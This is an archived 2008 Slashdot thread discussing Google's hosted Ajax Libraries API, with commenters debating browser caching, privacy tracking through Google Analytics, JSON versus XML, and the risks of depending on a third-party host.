Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
×
Programming Businesses Google The Internet IT Technology

Google To Host Ajax Libraries 285

ruphus13 writes "So, hosting and managing a ton of Ajax calls, even when working with mootools, dojo or scriptaculous, can be quite cumbersome, especially as they get updated, along with your code. In addition, several sites now use these libraries, and the end-user has to download the library each time. Google now will provide hosted versions of these libraries, so users can simply reference Google's hosted version. From the article, 'The thing is, what if multiple sites are using Prototype 1.6? Because browsers cache files according to their URL, there is no way for your browser to realize that it is downloading the same file multiple times. And thus, if you visit 30 sites that use Prototype, then your browser will download prototype.js 30 times. Today, Google announced a partial solution to this problem that seems obvious in retrospect: Google is now offering the "Google Ajax Libraries API," which allows sites to download five well-known Ajax libraries (Dojo, Prototype, Scriptaculous, Mootools, and jQuery) from Google. This will only work if many sites decide to use Google's copies of the JavaScript libraries; if only one site does so, then there will be no real speed improvement. There is, of course, something of a privacy violation here, in that Google will now be able to keep track of which users are entering various non-Google Web pages.' Will users adopt this, or is it easy enough to simply host an additional file?"
This discussion has been archived. No new comments can be posted.

Google To Host Ajax Libraries

Comments Filter:
  • by nguy ( 1207026 ) on Wednesday May 28, 2008 @10:26AM (#23570327)
    Compared to all the other crappy media that sites tend to have these days, centralizing distribution of a bunch of Javascript libraries makes almost no sense. I doubt it would even appreciably reduce your bandwidth costs.
    • by causality ( 777677 ) on Wednesday May 28, 2008 @10:37AM (#23570467)
      The "problem" already exists. It's "how can we collect more data about user's browsing habits?" You have to consider that Google is a for-profit business and hosting these files represents a bandwidth cost and a maintainence cost for them. They are unlikely to do this unless they believe that they can turn that into a profit, and the mechanism available to them is advertising revenue.

      This is very similar to the purpose of the already-existing google-analytics.com. I block this site in my hosts file (among others) and I take other measures because I feel that if a corporation wants to take my data and profit from it, they first need to negotiate with me. Since Google is not going to do that, I refuse to contribute my data. To the folks who say "well how else are they supposed to make money" I say that I am not responsible for the success of someone else's business model, they are free to deny me access to their search engine if they so choose, and I would also point out that Google is not exactly struggling to turn a profit.

      The "something of a privacy violation" mentioned in the summary seems to be the specific purpose.
      • Re: (Score:3, Interesting)

        by Shakrai ( 717556 ) *

        This is very similar to the purpose of the already-existing google-analytics.com. I block this site in my hosts file (among others) and I take other measures because I feel that if a corporation wants to take my data and profit from it

        Do you actually have to block it in your hosts file in order to effectively deny them information? I have it blacklisted in NoScript -- is that sufficient? I'd always thought it was called via Javascript.

        • by pjt33 ( 739471 )
          It is, but no reason not to block it in the host file. (You could easily have checked how it's called by viewing source, as /. uses it. Curiously the script is in the wrong place in this page: at the end of the head rather than the end of the body).
        • by causality ( 777677 ) on Wednesday May 28, 2008 @11:07AM (#23570889)

          Do you actually have to block it in your hosts file in order to effectively deny them information? I have it blacklisted in NoScript -- is that sufficient? I'd always thought it was called via Javascript.


          The file is indeed Javascript and it's called "urchin.js" (nice name eh?). Personally, I use the hosts file because I don't care to even have my IP address showing up in their access logs. This isn't necessarily because I think that would be a bad thing, but it's because I don't see what benefit there would be for me and, as others have mentioned, the additional DNS query and traffic that would take place could only slow down the rendering of a given Web page.

          I also use NoScript, AdBlock, RefControl and others. RefControl is nice because the HTTP Referrer is another way that sites can track your browsing; before Google Analytics it was common for many pages to include a one-pixel graphic from a common third-party host for this reason. Just bear in mind that some sites (especially some shopping-cart systems) legitimately use the referrer so you may need to add those sites to RefControl's exception list in order to shop there, as the default is to populate the referrer with the site's own homepage no matter what the actual referrer would have been.
          • by Shakrai ( 717556 ) *

            The file is indeed Javascript and it's called "urchin.js" (nice name eh?). Personally, I use the hosts file because I don't care to even have my IP address showing up in their access logs

            I guess that was my (badly phrased) question. Is blocking it in NoScript sufficient to stop Firefox from even downloading it (i.e: is it usually called with a javascript element as opposed to being an embedded image or some other method?) or should the truly paranoids also include it in the hosts file?

          • by Tumbarumba ( 74816 ) on Wednesday May 28, 2008 @11:47AM (#23571409) Homepage

            The file is indeed Javascript and it's called "urchin.js" (nice name eh?).
            "urchin.js" is the old name for the script. Google encourages webmasters to upgrade to the new ga.js, which has pretty much the same functionality, but some other enhancements. Both those scripts feed data into the same reports. If you're interested, you can see what the scripts is doing by looking at http://www.google-analytics.com/ga.js [google-analytics.com]. It's pretty compact JavaScript, and I haven't gone through it to work out what it's doing. Personally, I use it on the website for my wife's children's shoe shop [lillifoot.co.uk]. From my point of view, the reports I get out of Google Analytics are excellent, and really help me optimise the website for keywords and navigation. I will admit though, that it is a little creepy about Google capturing the surfing habits of people in that way.
            • Re: (Score:3, Interesting)

              by Firehed ( 942385 )
              Well that's just the dilemma. I use Google Analytics on all my sites, and sort of use the information to see what keywords are effective and most common. I don't then turn around and use that information to focus my content on those areas like any smart person would, but I don't really care if someone stumbles across my blog either (much more interesting are HeatMaps, not that I use that information in a meaningful way either).

              However, it's not just Google that's grabbing that kind of information. Anyone
          • by alta ( 1263 ) on Wednesday May 28, 2008 @12:06PM (#23571751) Homepage Journal

            I don't see what benefit there would be for me
            There are benefits, they just may not be as direct as you like, or appreciated.

            We use analiytics. We use it almost exclusively to improve the experience of our customers. We don't care how many people come to our site. We care how many buy... and we have internal reports for that. What we do care about is:
            How many people are not using IE. (We found it was worth making sure all pages worked on most all.

            How many people are at 1280*1024 or over.
            We dropped the notion that we needed to program for 800*600, thereby letting people use more of those big ass screens they buy.

            Where are most of the people located?
            We now have an east coast and west coast server.

            What pages are most viewed?
            We made them easier to get to.

            Who doesn't have flash?
            It was 2.08%, but I'm still not going to let them put flash on my site.
          • by sootman ( 158191 )
            I block it at the hosts level too (thanks to these guys [mvps.org]) because whenever Safari is pinwheeling on a site, it's usually because it's waiting for some bullshit like this. Ooh, wow, you're going to slow down my browsing experience for something totally worthless like this? No thanks. I'm close to blocking Digg for the same reason--every so often those little embedded counters take *forever* to come in.
      • by Daengbo ( 523424 ) <daengbo@gmail. c o m> on Wednesday May 28, 2008 @10:54AM (#23570707) Homepage Journal
        You have to consider that Google is a for-profit business and hosting these files represents a bandwidth cost and a maintainence cost for them.

        The bandwidth cost should be small since Google uses these libraries already and the whole idea is to improve browser caching. The maintenance cost of hosting static content shouldn't be that high, either. I mean, really.

        Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image.. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.
        • by causality ( 777677 ) on Wednesday May 28, 2008 @11:14AM (#23570979)

          Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image.. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.

          Low cost != no cost. While you definitely have a point about their corporate image, I can't help but say that recognizing a company as a data-mining machine as you have accurately done, and then assuming (and that's what this is, an assumption) an altruistic motive when they take an action that has a strong data-mining component, is, well, a bit naive. I'm not saying that altruism could not be the case and that profit must be the sole explanation (that would also be an assumption); what I am saying is that given the lack of hard evidence, one of those is a lot more likely.
      • by socsoc ( 1116769 ) on Wednesday May 28, 2008 @11:12AM (#23570955)
        Google Analytics is invaluable for small business. AWStats and others cannot compete on ease of use and accuracy. By blocking the domain in your hosts file, you aren't sticking it to Google, you are hurting the Web sites that you visit. I'm employed by a small newspaper and we use Google Analytics in order to see where our readers are going and how we can improve the experience for you. Google already has this information through AdSense, or do you have that blocked too? Again you're hurting small business.

        You may refuse to give them your data, but if I had the ability, Apache would refuse to give you my data until you eased off on the attitude.
        • Re: (Score:3, Funny)

          You may refuse to give them your data, but if I had the ability, Apache would refuse to give you my data until you eased off on the attitude.
          Brilliant! He pokes you with a thumbtack and you retaliate by shooting yourself in the foot!
          • Re: (Score:2, Interesting)

            by dintech ( 998802 )
            That doesn't make any sense. What the GP is saying is that he would like to be able to exclude users who deliberately set out to circumvent his business model. Kudos to him, I hope he finds it and posts it on slashdot when he's done.
      • by telbij ( 465356 ) on Wednesday May 28, 2008 @11:16AM (#23571003)
        Is it really necessary to be so dramatic?

        When you visit a website, the site owner is well within their rights to record that visit. To assert otherwise is an extremist view that needs popular and legislative buy-in before it can in any way be validated. The negotiation is between Google and website owners.

        If you want to think of your HTTP requests as your data, then you'd probably best get off the Internet entirely. No one is every going to pay you for it.

        Also:

        To the folks who say "well how else are they supposed to make money"


        Red herring. No one says that. No one even thinks about that. Frankly there are far more important privacy concerns out there than the collection of HTTP data.
        • Is it really necessary to be so dramatic?

          In what way was I dramatic? I dislike the side-effects of a business model, so I choose not to contribute to what I dislike. I wasn't claiming that any of this is the end of the world or some significant threat to society (which would constitute being dramatic), I was explaining how and why I choose not to participate.

          When you visit a website, the site owner is well within their rights to record that visit. To assert otherwise is an extremist view that needs po

          • We are not talking about the HTTP access logs of a site that I visit. We are talking about data shared with third parties for marketing purposes. This data does not materialize out of thin air; it requires my participation. So long as this is the case, I am well within my rights to decline to participate. To he who claims I used a red herring, please do explain what's wrong with that?

            The red herring is whether you're actually preventing any use of data. You're concerned that GA shares the data with Google as well as the site owner. But once your visit is logged at the server, the site owner can share that data with whoever the heck they feel like. The data in HTTP server logs are widely understand to be the property of the site owner and they are free to do whatever they want with them.

            The only difference is that it would not be obvious to you when it happens. If you think otherwise yo

        • Re: (Score:3, Insightful)

          by robo_mojo ( 997193 )

          When you visit a website, the site owner is well within their rights to record that visit.

          Yup. I have no way to stop them, afterall.

          The negotiation is between Google and website owners.

          Nope. If the website owner wanted to transmit information to Google, he can do so by having his server contact Google, or by dumping his logs to Google.

          Instead, if the website owner sends code to my browser to give information to Google, I am within my rights to refuse to do so.

          Alternatively, the website owner in qu

      • by dalmaer ( 725759 ) on Wednesday May 28, 2008 @11:32AM (#23571195)
        I understand that people like to jump onto privacy, but there are a couple of things to think about here: - We have a privacy policy that you can check out - There isn't much information we can actually get here because: a) The goal is to have JavaScript files cached regularly, so as you go to other sites the browser will read the library from the cache and never have to hit Google! b) If we can get browsers to work with the system they can likewise do more optimistic caching which again means not having to go to Google c) The referrer data is just from the page itself that loaded the JavaScript. If you think about it, if you included prototype.js anyway then we could get that information via the spider... but it isn't of interest. We are a for profit company, but we also want to make the Web a better faster place, as that helps our business right there. The more people on the Web, the more people doing searches, and thus the better we can monetize. Hopefully as we continue to roll out services, we will continue to prove ourselves and keep the trust levels high with you, the developers. Cheers, Dion Google Developer Programs Ajaxian.com
        • c) The referrer data is just from the page itself that loaded the JavaScript. If you think about it, if you included prototype.js anyway then we could get that information via the spider... but it isn't of interest.
          but now you also have the traffic pattern data for any of those sites that didn't use google analytics already, that's definitely valuable.
          • by JavaRob ( 28971 ) on Wednesday May 28, 2008 @01:35PM (#23573171) Homepage Journal

            but now you also have the traffic pattern data for any of those sites that didn't use google analytics already, that's definitely valuable.
            No, they don't. Look again at how caching works. The first time a given browser hits a site that uses Prototype, for example, it'll pull the JS from Google (so Google sees that single site). The browser then hits 20 other sites that also use Prototype... and Google has no clue, because the JS is already cached.

            In fact, the cache headers specify that the JS libs don't expire for A YEAR, so Google will only see the first site you visit with X library Y version in an entire year.

            Is this information really that valuable?

            Mind you, this assumes you're hard-coding the google-hosted URLs to the JS libs, instead of using http://www.google.com/jsapi [google.com] -- but that's a perfectly valid and supported approach.

            If you use their tools to wildcard the library version, etc. etc. then they get a ping each time that JSAPI script is loaded (again, no huge amount of info for them, but still you can decide whether you want the extra functionality or not).
      • The whole idea of having a single URI for these very common .js files is that they can be cached, and not just on your local computer. Any router with the ability to follow the HTTP1.1 cache protocol would serve these pages out of a local cache.

        Moreover, if this idea catches on, WebBrowsers will begin shipping with these well know URIs preinstalled, perhaps even with optimized versions of the scripts that cut out all the IE6 cruft. What is really needed to make this work is a high bandwidth, high availabil
    • by djw ( 3187 )

      The idea, as far as I can tell, is to improve browser caching, not just distribution.

      If a lot of sites that use prototype.js all refer to it by the same URL, chances are greater that a given client will already have cached the file before it hits your site. Therefore, you don't have to serve as much data and your users don't have to keep dozens of copies of the same file in their caches, and sites load marginally faster for everyone on the first hit only.

      Plus Google gets even more tracking data with

    • That very much depends on whose problem you're talking about.

      If you're a web site worried about javascript library hosting, caching and such, this will help, a bit. Mostly to banish an annoyance.

      If, on the other hand, you're a famous search engine who'd love to know more about who uses what javascripting libraries on which sites ... well, this sort of scheme is just your ticket.
  • If you want to improve the speed of downloading, how about removing 70% of the code which just encodes/decodes from XML and start using simple and efficient delimiters? I was a fan of Xajax, but I had to re-write it from scratch... XML is too verbose when you control both endpoints.

    It is not a problem to host an additional file, and this only gives Google more information than they need... absolutely no good reason for this.

    • Well, from my experience making AJAX libraries, the stuff to encode to XML is pretty minimal. It's pretty easy and compact to write code which when you call a function, sends an XML snippet to the server to run a specific function in a specific class, using a few parameters. The real lengthy part is getting the browser to do something with the XML you send back.
    • Re: (Score:3, Informative)

      by AKAImBatman ( 238306 )

      how about removing 70% of the code which just encodes/decodes from XML

      Done [json.org]. What's next on your list?

      (For those of you unfamiliar with JSON, it's basically a textual representation of JavaScript. e.g.

      {
      name: "Jenny",
      phone: "867-5309"
      }

      If you trust the server, you can read that with a simple "var obj = eval('('+json+')');". If you don't trust the server, it's still easy to parse with very little code.)

      • And if you still want to use jQuery for other JavaScript interface joy, it can handle JSON natively [jquery.com]. (Other frameworks probably do too, I just happen to be a fan of jQuery.)

      • This was a dumb feature in Javascript. In LISP, there's the "reader", which takes in a string and generates an S-expression, and there's "eval", which runs an S-expression through the interpreter. The "reader" is safe to run on hostile data, but "eval" is not. In Javascript, "eval" takes in a string and runs it as code. Not safe on hostile data.

        JSON is a huge security hole if read with "eval". Better libraries try to wrap "eval" with protective code that looks for "bad stuff" in the input. Some such

  • Well doh (Score:4, Insightful)

    by Roadmaster ( 96317 ) on Wednesday May 28, 2008 @10:28AM (#23570351) Homepage Journal

    Will users adopt this, or is it easy enough to simply host an additional file?
    Well duh, it's dead easy for me to just host another file, so easy in fact that web frameworks usually do it for you by default, but that's missing the point: the point is that for the end-user it would be better, faster and more efficient if I went to the trouble of using google's hosted version, instead of using my local copy. That, indeed, would be more work for me, but it benefits the end user.
    • but it benefits the end user.
      And google too ;)
    • by Nursie ( 632944 )
      How?

      A bit of code (unless I'm missing something) is going to be smaller than your average image. What's the gain?
      Other than for google of course.
  • by CastrTroy ( 595695 ) on Wednesday May 28, 2008 @10:31AM (#23570391)
    This is only a partial solution. The real solution is for sites using AJAX to get away from this habit of requiring hundreds of kilobytes of scrip just to visit the home page. Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple pages wouldn't have to download the entire library. Have each function in it's own file, and then when an AJAX call is done, make it smart enough to figure out which functions need to be downloaded to run the resulting Javascript. The problem with Google hosting everything, is that everybody has to use the versions that Google has posted, and that you can't do any custom modifications to the components. I think that what Google is doing would help. But the solution is far from optimal.
    • by dmomo ( 256005 )
      > The problem with Google hosting everything, is that everybody has to use the versions that Google has posted, and that you can't do any custom modifications to the components. I think that what Google is doing would help. But the solution is far from optimal.

      That isn't too much of a problem. You can include the Google version first and then override any function or object by simply redeclaring it.
    • by Bobb Sledd ( 307434 ) on Wednesday May 28, 2008 @10:46AM (#23570603) Homepage
      Yikes...

      Maybe it is possible to get TOO modular. Several problems with that:

      1. With many little files comes many little requests. If the web server is not properly set up, then the overhead these individual requests causes really slows the transmission of the page. Usually, it's faster to have everything in one big file than to have the same number of kilobytes in many smaller files.

      2. From a development point of view, I use several JS bits that require this or that library. I don't know why or what functions it needs. And I really don't care; I have my own stuff I want to worry about. I don't want to go digging through someone else's code (that already works) to figure out what functions they don't need.

      3. If I do custom work where file size is a major factor or if I only use one function from the library, I guess then I'll just modify as I see fit and host on my own site.

      I think what Google is doing is great, but I can't really use it for my sites (they're all secure). So unless I want that little warning message to come up, I won't be using it.
    • by ClayJar ( 126217 ) on Wednesday May 28, 2008 @10:52AM (#23570677) Homepage

      Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple pages wouldn't have to download the entire library. Have each function in it's own file, and then when an AJAX call is done, make it smart enough to figure out which functions need to be downloaded to run the resulting Javascript.
      Actually, the trend is in the opposite direction. By including everything in one file, you can greatly reduce the number of HTTP transactions. Eliminating the significant overhead there can improve "speed" tremendously.

      Additionally, if you're using compression, it is likely that one large file will compress more effectively than a collection of smaller files. (You *are* using compression, aren't you?)
      • But isn't the whole point of AJAX to reduce server load by having users do lots of little requests instead of a few large requests? While one large file would compress better than many small files, would one large file compress better than 1/10 of the data actually being sent out because the user didn't need the other 9/10 of the data? You could also optimize the fetching of code by sending a single request to request all the Javascript for a specific action in just one request. Which would contain a big
    • It's a good idea, but you're trading a little bandwidth for a lot of extra requests (and latency). And besides: a few hundred kilobytes isn't a big deal these days if users only have to download it once, which is what Google is doing. Custom per-site implementations defeat that.
    • by vitaflo ( 20507 )
      Mootools sort of does this, but on the developer end. When you download Mootools you get to choose which components you want as part of your JS libs. Just need AJAX and not the fancy effects, CSS selectors, etc? Then you can just include the AJAX libs into Mootools and forget the rest. It's not load on demand, but at least it's better than having to download a 130k file when you're only using 10k of it.
    • Re: (Score:3, Informative)

      by lemnar ( 642664 )
      AJAX systems are modular - at least some of them are somewhat. Scriptaculous, for example, can be loaded with with only certain functions.

      "With Google hosting everything," you get to use exactly the version you want - google.load('jquery', '1.2.3') or google.load('jquery', '1.2'), which will get you the highest version '1'.2 available - currently 1.2.6. Furthermore, you can still load your own custom code or modifications after the fact.

      For those concerned about privacy: yes they keep stats - they e
    • This is only a partial solution. The real solution is for sites using AJAX to get away from this habit of requiring hundreds of kilobytes of scrip just to visit the home page. Couldn't you design a modular AJAX system that would bring in functions as they are needed?

      It exists. It's called mooTools. The Javascript programmer can decide which functions/objects/classes he needs on any individual web page and download a packed version of the library that only suits their particular needs.

      That way, someone vis

  • nothing new here (Score:5, Informative)

    by Yurka ( 468420 ) on Wednesday May 28, 2008 @10:32AM (#23570411) Homepage
    The DTD files for the basic XML schemas had been hosted centrally at Netscape and w3.org since forever. No one cares or, indeed, notices (until they go down [slashdot.org], that is).
  • Yabbut (Score:3, Interesting)

    by FlyByPC ( 841016 ) on Wednesday May 28, 2008 @10:35AM (#23570441) Homepage
    Yeah, but what if Google decides that nobody is using these -- or they can't legally host them for whatever reason -- or they just decide that they don't want to do this anymore?

    I like Google too -- and this is nice of them -- but I like the idea of a website being as self-sufficient as possible (not relying on other servers, which introduce extra single-points-of-failure into the process.)

    At the risk of sounding like an old curmudgeon, whatever happened to good ol' HTML?
    • by SuperBanana ( 662181 ) on Wednesday May 28, 2008 @10:45AM (#23570585)

      Yeah, but what if Google decides that nobody is using these -- or they can't legally host them for whatever reason -- or they just decide that they don't want to do this anymore?

      Think broader. What happens when:

      • Google decides to wrap more than just the promised functionality into it? For example, maybe "display a button" turns into "display a button and report usage stats"?
      • Google gets hacked and malicious Javascript is included?

      But, yes- you're right. This is a scary new dependency. For a company full of PhD geniuses supposedly Doing No Evil, nobody at Google seems to understand how dangerous they are to the health of the web. In fact, I'd suggest they do, and they don't care- because they seem hell-bent on making everything on the web touch/use/rely upon Google in some way. This is no exception.

      A lot of folks don't even realize how Google is slowly weaning open-source projects into relying on them, too (with Google Summer of Code.)

      • Re: (Score:3, Insightful)

        Oh no! If Google decides they don't want to spend the $10/year this will cost them anymore, I might have to change a header and footer script! Or *gasp* use a search-and-replace to fix the URLs!

        I'm *so* scared.

        Google is supporting web apps and offering to host the nasty boring bits that need strong caching. How very evil of them.

        And if Google is hacked, we're ALL screwed a hundred different ways. The average web developer *using* these libraries is more likely to have a vulnerable server than Google.
      • by mckinnsb ( 984522 ) on Wednesday May 28, 2008 @12:18PM (#23571957)
        Being a Javascript programmer myself, I was wondering which post to reply to. I guess this one suits. There are a lot of issues I'd like to tackle, here.

        Yeah, but what if Google decides that nobody is using these -- or they can't legally host them for whatever reason -- or they just decide that they don't want to do this anymore?

        Then you go back to including a script tag in your header of your HTML document. All of these frameworks are free. They will likely remain free even though some are sponsored (mooTools). The speed improvement exists, but is moderate-to-minimal, since a packed full-inclusion library of mooTools runs you about 32kb. That's 32kb the user wont need to download again and again, but its just 32kb.

        Think broader. What happens when: * Google decides to wrap more than just the promised functionality into it? For example, maybe "display a button" turns into "display a button and report usage stats"?

        Even if the code is compressed and obfuscated, this "wrapped functionality" would become *glaringly* obvious to any javascript programmer using Firebug. The news would most likely spread like wildfire. Especially on /. The only thing they could track without really being monitored are which IP addresses are requesting the mooTools.js (for example) file. They could measure its popularity, but not *necessarily* what sites they are visiting. Granted- I haven't looked at the API yet, but if its just a .js file hosted on a Google server, there isn't really too much they can monitor that they don't already. Analytics provides them with *tons* more information. To be honest, this just seems like a professional courtesy.

        There is a key point here I hope was visible - JavaScript is totally Load on Delivery, Executed Client Side. They can't really sneak much past you , and any efforts to do so would still remain visible in some way (you would see NET traffic).

        * Google gets hacked and malicious Javascript is included?

        Interesting, but I haven't seen Google hacked yet - not saying it can't happen, but I've not seen it. There is more of a chance of someone intercepting the expected .js file and then passing a different one- however, keep in mind that if you are doing *anything* that requires any level of security what so ever in JS, well, you have other, deeper fundamental problems.

        But, yes- you're right. This is a scary new dependency. For a company full of PhD geniuses supposedly Doing No Evil, nobody at Google seems to understand how dangerous they are to the health of the web. In fact, I'd suggest they do, and they don't care- because they seem hell-bent on making everything on the web touch/use/rely upon Google in some way. This is no exception. A lot of folks don't even realize how Google is slowly weaning open-source projects into relying on them, too (with Google Summer of Code.)

        It is a dependency, but its not that scary. Open source projects have always been, for better or worse, more or less reliant on outside momentum to keep them going. Joomla has conferences (that you have to pay to see), MySQL is powered by Sun, Ubuntu has pay-for-support. The fact that Google is willing to pay for kids to work on open source projects of their choosing (and granted, Google's selection), is not necessarily a form of control above and beyond the influence of capital. If I had millions of dollars, I would probably donate to open source projects myself - and they may be ones of my choosing - but I probably couldn't consider myself controlling them as much as helping them grow.

        This is really nothing more than a professional courtesy offered by Google. They are right - its dumb for everyone to download the same files over and over again.

        Furthermore, someone made a post earlier talking about JS programmers needing to learn how to use "modularity". We

      • Re: (Score:3, Insightful)

        by caerwyn ( 38056 )
        I'll take the benefits of Google supporting open source over "GSoC is evil" paranoia.

        If Google suddenly decides to stop hosting these, or touches them in some fashion, it's going to get discovered and fixed in well under 24 hours. Google hosting a file like this means that there are going to be a *lot* of eyes on the file.

        Google is, as it currently stands, far from "dangerous to the health of the web". Outside of using their webmail fairly heavily, I could avoid using google quite easily- as could any other
  • I won't adopt (Score:5, Insightful)

    by corporal_clegg ( 547755 ) on Wednesday May 28, 2008 @10:37AM (#23570461) Homepage
    As a developer, privacy of my users is of paramount importance. I have grown increasingly concerned with Google's apparently incessant need to pry into my searches and my browsing habits. Where once I was a major Google supporter, I have trimmed my use of their service back from email and toolbars to simple searches and now even won't use their service at all if I am searching for anything that may be misconstrued at some point by guys in dark suits with plastic ID badges. The last thing I am going to do as a developer is force my users into a situation where they can feed the Google Logging Engine.
  • Comment removed (Score:3, Insightful)

    by account_deleted ( 4530225 ) on Wednesday May 28, 2008 @10:43AM (#23570557)
    Comment removed based on user account deletion
    • Re: (Score:3, Informative)

      Because the hundred other pages the visitor went to that session is also demanding their own copy of the library be downloaded. It's not your bandwidth this saves (only trivially it is) - it's the end user's download, and parse, of the same code for each of the dozen sites he visits that use the same library. The libraries Google has initially chosen are extremely popular - i.e. there are good odds that you have a dozen copies in your browser cache right now - each download of which made your browsing exp
  • by Gopal.V ( 532678 ) on Wednesday May 28, 2008 @10:43AM (#23570559) Homepage Journal

    I didn't see no slashdot article when yahoo put up hosted YUI packages [yahoo.com] served off their CDN.

    I guess it's because google is hosting non-google libraries?

  • by samuel4242 ( 630369 ) on Wednesday May 28, 2008 @10:45AM (#23570581)
    With their own YUI libraries. See here [yahoo.com] Anyone have any experience with this? I'm a bit wary of trusting Yahoo, although I guess it's easy enough to swap it out.
  • by Anonymous Coward on Wednesday May 28, 2008 @10:55AM (#23570723)
    A far better solution would be to add a meta-tag to a call, which the browser could check to see if it has it. For security reasons you need to define it always to use it, so if you don't define it, there will never be a mixup.

    Eg:

    script type="javascript" src="prototype.js" origin="http://www.prototype.com/version/1.6/" md5="..............."

    When another user want to use the same lib, he can the use the origin, and the browser will not download it from the new site. It's crucial to use the md5 (or other method), which the browser must calculate the first time it download it. Or else it would be easy to create a bogus file and get it run on another site.

    Of course this approach is only as secure as the hash.
  • The web really needs some sort of link to a SHA-256 hash or something. If that kind of link were allowed ubiquitously it could solve the Slashdot effect and also make caching work really well for pictures, Ajax libraries and a whole number of other things that don't change that often.

    • I wish I could go back and my post...

      It would also solve stupid things like Netscape ceasing to host the DTDs for RSS.

  • I know it is not obvious, but sites that are sensitive to bandwidth issues may find this a cost saving measure.
    Google, of course, gets even more information about everyone.

    win win, except for us privacy people. I guess we have to true "do no evil," huh?
  • Yeah, so it downloads some Ajax library twice, or even ten times, or a hundred. So what? The ads on your typical webpage are ten times as much in size and bandwidth.

    Thanks, but I prefer that my site works even if some other site I have nothing to do with is unreachable today. Granted, Google being unreachable is unlikely, but think about offline copies, internal applications, and all the other perfectly normal things that this approach suddenly turns into special cases.
    • But that's the point - those ads are already mostly centrally hosted - i.e they were already using a few common sources - now the code libraries have a common source.
  • Umm, no (Score:4, Interesting)

    by holophrastic ( 221104 ) on Wednesday May 28, 2008 @11:24AM (#23571103)
    First, I block all google-related content, period. This type of thing would render many sites non-operational.

    Second, I've always had this complaint with the whole external javascript files. When you're already downloading a 50K html page, another 10K of javascript code in the same file inline downloads at full-speed. The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense. Even as a locally cached file, on a broadband connection, downloading the extra 10K is typically faster than opening and reading the locally cached file!

    But still, hosting a part of your corporate web-site with google simply breaches most of your confidentiality and non-disclosure agreements that you have with your clients and suppliers. It's that simple. Find the line that reads "shall not in any way disclose Confidential Information to any third party at any time, including consultants and contractors, copy and/or merge the Confidential Information/business relationship with any other technology, software or materials, except contractors with a specific need to know . . ."

    Simply put, if your Confidential client conversations go over gmail, you're in breach. If google tracks/monitors/sells/organizes/eases your business with your clients or suppliers, you're in breach -- i.e. it's illegal, and your own clients/suppliers can easily sue you for giving google their trade secrets.

    Obviously it's easier to out-source everything and do nothing. But there's a reason that google and other such companies offer these services for free -- it's free as in beer, at the definite cost of every other free; and it's often illegal for businesses.
    • by _xeno_ ( 155264 )

      Second, I've always had this complaint with the whole external javascript files. When you're already downloading a 50K html page, another 10K of javascript code in the same file inline downloads at full-speed. The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense. Even as a locally cached file, on a broadband connection, downloading the extra 10K is typically faster than opening and reading the locally cached file!

      That's not the reason that I generally use external JavaScript files. The reason is code reuse, pure and simple. Generally speaking it's far easier to just link to the file (especially for static HTML pages) than it is to try and inline it. That way when you fix a bug that effects Internet Explorer 6.0.5201 on Windows XP SP1.5 or whatever you don't have to copy it to all your static files as the code is in a single location.

      Sure, you could use server-side includes, but then you need to make sure that yo

    • The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense.

      To the end user, you are right. However, from a web developer/programming standpoint, it actually does make sense. It is all about modular use of code -- when you write C/C++ programs, do you incorporate all of the code in-line, or do you reference standard libraries to handle some of the common functions? You use standard libraries of course, because it makes your code easier to maintain. If you need to update a function, you change it in one place (the external library) and voila! All of your code

    • So, don't put confidential information in your GET requests, and they won't be part of the referrer sent to Google. Duh.
    • Re: (Score:3, Interesting)

      by Bogtha ( 906264 )

      Second, I've always had this complaint with the whole external javascript files. When you're already downloading a 50K html page, another 10K of javascript code in the same file inline downloads at full-speed. The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense.

      It almost always makes sense. The external file only requires another hit to the server the first time you see it. From that point on, every page hit is smaller in size b

    • But still, hosting a part of your corporate web-site with google simply breaches most of your confidentiality and non-disclosure agreements that you have with your clients and suppliers. It's that simple. Find the line that reads "shall not in any way disclose Confidential Information to any third party at any time, including consultants and contractors, copy and/or merge the Confidential Information/business relationship with any other technology, software or materials, except contractors with a specific need to know . . ."

      There is a legal definition of "confidential information" to be satisfied if one were to actually pursue a breach of contract. I do not see how HTTP GET requests could possibly satisfy that. Google would see only a requesting IP and what file was served (a standard UI library). This is not substantially different from what any intermediary on the public Internet would see as the packets passed through.

      If you and I have an NDA, and I place a call to you from my cell phone, the mere existence of that call do

    • all SMTP passes in the open right?

      google or not-- emails pass through third parties all the time.
  • by Rich ( 9681 ) on Wednesday May 28, 2008 @11:34AM (#23571227) Homepage
    Well, one effect of this would be to allow google to execute scripts in the security context of any site using their copy of the code. The same issue occurs for urchin.js etc. If your site needs to comply with regulations like PCI DSS or similar then you shouldn't be doing this as it means google has access to your cookies, can change your content etc. etc.

    For many common sites that aren't processing sensitive information however, sharing this code is probably a very good idea. Even better would be if google provided a signed version of the code so that you could see if it has been changed.
    • Re: (Score:3, Informative)

      These are static releases of library code written by others.

      Google would only be able to execute Javascript on your user's page if they modified the source code of the library you were loading from them. Which would be a BIG no-no.

      (Google does have a "loader" function available, but also just allows you to include the libraries via a traditional script tag to a static URL.)

      Otherwise, cookies are NOT cross-domain and wouldn't be passed with the HTTP request, unless you were silly enough to CNAME your "js.mys
      • by Rich ( 9681 )
        I'm afraid you have no guarantee the code is unmodified - that's why I suggested it should be signed. You're also wrong about the cookies as they are accessible from javascript using document.cookie which means that any malicious script could access them (and even send them to a 3rd party). There is an HTTPOnly flag on cookies (an extension added in IE6sp1 but that flag has to be specifically set (see http://www.owasp.org/index.php/HTTPOnly [owasp.org] for more details).
        • by richardtallent ( 309050 ) on Wednesday May 28, 2008 @01:45PM (#23573361) Homepage
          Do you *honestly* think that Google is going to modify the code for Prototype and slap some AdSense/Analytics goodies in there?

          The library developers would have their hide if they attempted such a thing!

